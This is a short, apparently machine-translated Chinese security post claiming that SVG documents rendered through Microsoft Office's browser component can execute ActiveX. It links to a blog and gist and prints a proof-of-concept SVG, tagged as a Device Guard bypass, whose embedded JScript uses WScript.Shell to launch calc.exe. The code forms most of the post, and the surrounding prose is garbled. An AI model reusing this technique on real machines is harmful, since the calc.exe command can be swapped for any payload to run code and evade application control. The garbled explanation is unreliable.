视频演示:
1实际上我们不需要Internet Explorer来执行ActiveX
2我们将使用Microsoft Office与Microsoft Office一起使用浏览器Microsoft Office通过SVG Document执行ActiveX
[3]注意此方法仅适用于Web浏览器Microsoft Office中的SVG Document
https://homjxi0e.wordpress.com/2018/08/26/svg-document-activex-alongside-microsoft-word-execution/
https://gist.githubusercontent.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0/raw/332b3fa640bb2fff6c59b38a28eaea39b9ec5df6/x000x02.svg
1
2
3
4
5
6
7
8
9
10
11
| <?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" width="600" height="600">
<script language="JScript">
<![CDATA[ <!-- Author Matt harr0ey @harr0ey <!-- Topic: Device Guard Bypassing <!-- WScript inside SVG var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]>
</script>
<rect id="square" width="0" height="0" fill="#ff0000"
x="10" y="10" />
</svg>
|
